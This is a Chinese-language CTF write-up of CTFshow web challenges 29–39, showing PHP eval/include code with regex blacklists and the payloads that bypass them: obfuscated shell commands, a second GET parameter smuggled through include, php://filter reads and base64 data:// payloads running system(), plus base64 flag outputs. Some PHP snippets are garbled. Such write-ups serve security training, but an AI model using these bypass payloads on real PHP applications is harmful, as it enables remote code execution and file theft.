CTFshow-web-vip-RCE-29-39(黑名单绕过,伪协议)

web29-黑名单绕过

解法一:nl 命令

1
2
nl命令可以用来读取文件内容,当输入nl时,终端会进入监听模式,此时输入文件名可以进行读取
但是直接输入nl好像不会放出文件内容,不知道是不是我的打开方式有问题
  • echo nl flag or echo nl f""lag

nl命令执行结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){//不区分大小写
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

解法二:变形shell

  • show_source(base64_decode(“ZmxhZy5waHA=”));
  • echo tac fla*;
  • show_source(next(array_reverse(scandir(“.”))));
  • echo%20exec(“cat%20f\lag.p\hp”);

一些有意思的思路

1. 创造参数执行RCE

我们可以注意到在源码中,if(!preg_match("/flag/i", $c))通过这样的方式对参数c的值进行Waf,那么我们此时传入的c=include$_GET[1],所以并不会触发waf,这意味着我们创建了一个新的参数,这个参数是没有waf的,那么我们可以做到几乎所有的shell,连接蚁剑等。

1
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

2. 利用cp命令将flag拷贝到别处

在CTF里面确实需要一些创新思路

1
?c=system("cp fl*g.php a.txt");

web 30-黑名单绕过

上面的解法2依旧可用,这里尝试替换system。

这里多了一些函数,禁掉了system 但是可以使用passthru或者shell_exec:

  • passthru(“cat f\lag.p\hp”);
  • echo shell_exec(“cat fl\ag*“);
  • echo nl fl''ag.p''hp;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

web31-黑名单绕过

同样多了一些函数以及空格禁用,但是无妨:

  • eval($_GET[“1”]);&1=echo shell_exec(“tac flag.php”);
  • c=passthru(“tac%09fla*”);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

web32-filter

文件包含:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

web 33-filter

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
c=?>&1=php://filter/read=convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 02:22:27
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i"$c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
1
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YzMxYTZhYzItY2ZhOS00MmY3LWI0MjUtMjZhYzExYTg2NjE1fSI7DQo=

web 34-filter

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 04:21:29
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i"$c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

web 35-filter

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 04:21:23
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i"$c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);

1
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZmQ4NDZhMTAtMmQ3Mi00MjhlLWEyZjAtMmRkNGFlNmE0MjllfSI7

web 36-filter

c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
@Author: h1xa
@Date:   2020-09-04 00:12:34
@Last Modified by:   h1xa
@Last Modified time: 2020-09-04 04:21:16
@email: h1xa@ctfer.com
@link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i"$c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YTViMDY0NmMtYWY4NC00ZDEyLWE1Y2YtZmQyMDFhYTIxN2M1fSI7

web 37-data协议

  • c=data://text/plain,
  • c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}

web 38-data协议

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}

web 39-data协议

c=data://text/plain,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
}else{
    highlight_file(__FILE__);
}